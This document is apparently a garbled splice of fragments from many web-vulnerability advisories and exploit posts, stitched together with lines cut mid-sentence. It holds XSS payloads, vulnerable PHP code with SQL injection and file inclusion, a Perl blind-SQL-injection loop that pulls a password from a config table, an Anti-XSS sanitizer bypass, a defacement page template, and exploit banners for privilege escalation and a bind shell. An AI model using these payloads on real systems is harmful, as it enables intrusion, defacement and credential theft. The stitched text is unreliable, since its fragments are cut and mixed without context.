<div id="command_centerlocalhost" name="command_centerlocalhost">
<fieldset style="background-color: rgb(255, 255, 255); border: 0px none; padding: 10px;" width="90%"><legend style="font-weight: normal; border: 0px none;"><font color="#303030" style="font-weight: bold;">Command Center for localhost
</font> </legend></fieldset> <div align="left" style="background-color: rgb(255, 255, 255); width: 90%;"><div align="left" style="width: 500px; border: 1px solid rgb(177, 192, 240);"><input type="hidden" value="pserver" name="frm_o_o[0][class]"/>
<input type="hidden" value="localhost" name="frm_o_o[0][nname]"/>
Server: demo.endian.com/
Path: /cgi-bin/
File: proxyconfig.cgi
<div id="page-content-box"> <div id="notification-view" class="spinner" style="display:none"></div>
<div id="module-content">
<script type="text/javascript">
$(document).ready(function() {
/* Enable visualization of service notifications */
display_notifications(["squid","dansguardian","havp","sarg"], {"startMessage": "Proxy settings are being
tunnels between Astaro installations, administrators can save management time and automate many of the tasks involved in successfully linking
sites together with encrypted links. The Astaro Command Center is an entirely free product that allows you to centrally monitor and maintain
multiple Astaro installations & devices. If you currently are responsible for more than one Astaro Gateway product, ACC is designed for you!
Read on for more information. Starting with this release, it is now possible to setup site-to-site VPN tunnels with an amazing degree of ease
from within Astaro Command Center itself. Simply indicate the devices to be joined together via VPN, select a few options, and the rest is
automated with no need to login to each individual WebAdmin for the configuration. ACC is presented in the same administrative style as our AxG
Version 7 WebAdmin, so that if you are new to ACC you will have no trouble getting started within a familiar looking environment.
(Copy from vendor's homepage: http://up2date.astaro.com/2009/03/astaro_comand_center_20_releas.html#more)
####templates/admin/loign.tpl
<form method="post" action="$sLoginPage" name="form">
<fieldset>
<input type="hidden" name="sLoginPageNext" value="$_SERVER[REQUEST_URI]" />
<div id="login"><label>$lang['Login']:</label><input type="text"
name="sLogin" class="input" value="$_COOKIE[sLogin]" /></div> //XSS
<div id="pass"><label>$lang['Password']:</label><input
type="password" name="sPass" class="input" value="" /></div>
<div id="submit"><input type="submit" value="$lang['log_in']
»" /></div>
The vulnerabilities can be exploited by remote attackers with low or high required user interaction.
For demonstration or reproduce ...
<td xmlns="http://www.w3.org/1999/xhtml" class="layoutColumn center">
<div id="messageBlock" class="block">
<div class="blockContents messageContents">
<table class="messageBlock">
<tbody><tr><td>
<img title="_FAILURE" alt="_FAILURE" class="sprite32 sprite32-warning" src="themes/default/images/others/transparent.gif"/>
####################
- Code Snippet:
####################
themes/default/index.php #line:14-17
<div id="twocols" class="clearfix">
<div id="maincol" >maincol<?php include($main);?></div>
<div id="rightcol" >right col<?php include($right);?></div>
</div>
####################
Proof of Concept:
=================
The vulnerability can be exploited by remote attackers. For demonstration or reproduce ...
<div id="curmessage"><span class="msgOut"><div class="msgSender">2010-12-28 18:49:22</div><div style="background: url("GreenTopLeft.gif")
no-repeat scroll left top transparent;" class="msgContainer"><div style="background: url("GreenTopRight.gif") no-repeat scroll right top
transparent;" class="msgTopRight"></div><div style="background: url("GreenTop.gif") repeat-x scroll left top transparent;" class="msgTop">
</div><div class="msg">Wir sind schon los, zuspatkommen macht keinen guten Eindruck.<div style="background: url("GreenMiddle.gif") repeat
scroll left top transparent;" class="msgMiddle"></div><div style="background: url("GreenLeft.gif") repeat-y scroll left top transparent;"
/-----
hq/web/common/GenericError.jsp:
...
<c:if test="${not empty exception}">
<div id="exception" style="visibility:hidden">
<%=StringUtil.getStackTrace(exception)%>
</div>
<c:if test="${not empty root}">
<div id="root" style="visibility:hidden">
<%=StringUtil.getStackTrace(root)%>
} else {
echo "error : ".php_uname();
}
} else {
?>
<div align="center">
<h3>Deadly Script</h3>
<font color=red>Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</font><br />
<pre><div align="center">
</pre></div><br />
<table border="0" cellspacing="0">
"https://<server>:3001/adminDownloads.htm" does not show any content in
the browser view. However the HTML-source of this frame contains
sensitive information like an administrative call server user account:
---
<div id="call_server_host" value="10.11.12.13"></div> [...]
<div id="call_server_telnet_port" value="23"></div> [...]
<div id="call_server_user" value="admin123"></div>
<div id="call_server_pwd" value="hugo123"></div>
---
+++include/admin/banlist.php @@ 88:104
88 if($_GET["curr"] && $_GET["delete"]){
89
90 ?>
91
92 <div class="PhorumInfoMessage">
93 Are you sure you want to delete this entry?
94 <form action="<?php echo $PHORUM["admin_http_path"] ?>" method="post">
95 <input type="hidden" name="module" value="<?php echo $module; ?>" />
XXX 96 <input type="hidden" name="curr" value="<?php echo $_GET['curr']; ?>" />
97 <input type="hidden" name="delete" value="1" />
MAXLENGTH=16><br /><span style="color: #666;">Your Passcode is your PIN
+ the number displayed on your token (the Tokencode).</span></TD>
</TR>
</TABLE>
</div>
<P class="buttons">
<INPUT TYPE=SUBMIT VALUE="Log In">
<INPUT TYPE=RESET VALUE="Reset">
</P>
$content = @mysql_fetch_array(mysql_query('select var from '.$dbFIX.'layout_config where opt = \'page\' and var like \''.$_GET['id'].'|%\'')); // <= 3
$content = str_replace($_GET['id'].'|', '', $content['var']);
$path = 'layout/'.$config['theme'];
include 'layout/'.$config['theme'].'/head.page.php'; //
?>
<div id="mainFrame"><?php echo $content; ?></div>
<div class="clear"></div>
<?php
include 'layout/'.$config['theme'].'/foot.page.php'; //
<td><a onclick="openEdit('/popup/properties/1194/orig/page/88')" href="javascript:void(1194)
" class="">">​​​​​<iframe a="" <<="" onload='alert("VulnerabilityLab")' src="a"></td>
<td>page/default</td>
<td>0</td>
<td>0</td>
<td><div class="onxshop_page_properties"><a class="onxshop_delete"
title="Delete default" href="#1194"><span>Delete</span></a></div></td></tr>
</tbody>
</table>
$content = @mysql_fetch_array(mysql_query('select var from '.$dbFIX.'layout_config where opt = \'page\' and var like \''.$_GET['id'].'|%\''));
$content = str_replace($_GET['id'].'|', '', $content['var']);
$path = 'layout/'.$config['theme'];
include 'layout/'.$config['theme'].'/head.page.php'; // <= 1
?>
<div id="mainFrame"><?php echo $content; ?></div>
<div class="clear"></div>
<?php
include 'layout/'.$config['theme'].'/foot.page.php'; // <= 2
Baidu Hi IM client software DoS bug: a division by zero makes the client crash
-- CVE ID:
Not assigned
-- Affected Vendors:
Baidu
-- Affected Products:
Baidu Hi IM software
For demonstration or reproduce ...
Code Review: Users - User Listing
<div style="display: inline; vertical-align: middle; white-space: nowrap; padding: 4px 2px 4px 0px;">>"<INCLUDE PERSISTENT SCRIPTCODE HERE!!!>
</div> <span>Known IP addresses of user '>"<INCLUDE PERSISTENT SCRIPTCODE HERE!!!>'</iframe></span>
Code Review: Add New Network Listing
The HTML response is below:
<html>
<form name="ctl01" method="post"
action="xss.aspx" id="ctl01">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxYCHglpbm5lcmh0b
WwFHTxzY3JpcHQ+YWxlcnQoJ3hzcycpPC9zY3JpcHQ+ZGQ=" />
</div>
<script>alert('xss')</script></form>
code. This library mitigates against several issues independently
reported by Red Hat Security Response Team member Marc Schoenefeld
and Mozilla security researcher Christoph Diehl (CVE-2010-3768).
Security researcher wushi of team509 reported that when a XUL tree
had an HTML <div> element nested inside a <treechildren> element then
code attempting to display content in the XUL tree would incorrectly
treat the <div> element as a parent node to tree content underneath
it resulting in incorrect indexes being calculated for the child
content. These incorrect indexes were used in subsequent array
operations which resulted in writing data past the end of an allocated
$k=1;
$z=48;
while(($k<=32) && ($z<=126)){
my $blindsql=$_[0].'+AND+ascii(substring((SELECT+password+FROM+config),'.$k.',1))='.$z.'%23';
$output=&request($blindsql);
if ( $output =~ (/\<div id=\"descrp\">([a-zA-Z0-9\s]+)\<\/div\>/))
{
$pass=$pass.chr($z);
$k++;
$z=47;
}
The HTML response is below:
<html>
<form name="ctl01" method="post"
action="xss.aspx" id="ctl01">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxYCHglpbm5lcmh0bWwFHTxzY3JpcHQ+YWxlcnQoJ3hzcycpPC9zY3JpcHQ+ZGQ=" />
</div>
<script>alert('xss')</script></form>
</html>
-------------
Microsoft Anti-XSS Library 3.0 and 4.0 are vulnerable to an attack in which an attacker is able to create a specially formed CSS, that after passing through the GetSafeHTML or GetSafeHtmlFragment methods, contains an expression that triggers a JavaScript call in Internet Explorer.
The following ASP.NET code demonstrates the vulnerability:
1. string data = Microsoft.Security.Application.Sanitizer.GetSafeHtml("<html>a<style><!--div{font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'}--></style><div>b</div></html>");
2. string data = Microsoft.Security.Application.Sanitizer.GetSafeHtmlFragment("<div style=\"font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'\">aaa</div>");
Explanation
-----------
<html>
<head>
<title>HACKED BY YOUR-NAME</title>
</head>
<body>
<div id="iFrame1" style="position:absolute; left:0px; top:0px; z-index:0">
<iframe name="iFrame1" width=1024 height=3186 src="http://YOUR-SITE/YOUR-PATH/YOUR.html" scrolling="no" frameborder="0"></iframe>
</div>
</body>
</html>
Copyright (C) 2009-2010 firelinking by eidelweiss
</br>
Apple Safari (heap spray) Remote BOF Exploit for osX
Bind Shell Delivered on Port: 4444
</br>
<div id="content">
<p><FONT> </FONT></p>
<p><FONT>Behahahahahaahahhsyuuuuucrash</FONT></p>
<p><FONT>Crooooooooooooooot</FONT></p>
<p><FONT>Modyaaaaaaaar </FONT></p>
</div>
$db_prefix=$ARGV[6];
}
#Testing
my $finalrequest = $finalhost;
$output=&request($uid,$code,$finalrequest);
if ( $output =~ /<div class="title">Access denied<\/div>/)
{
print "\t-----------------------------------------------------------------\n";
print "\tYour credentials are not correct! This exploits need login.\n";
print "\tOptions: [your-id-user],[your-password] incorrect.\n";
print "\tExploit failed! No luck!\n";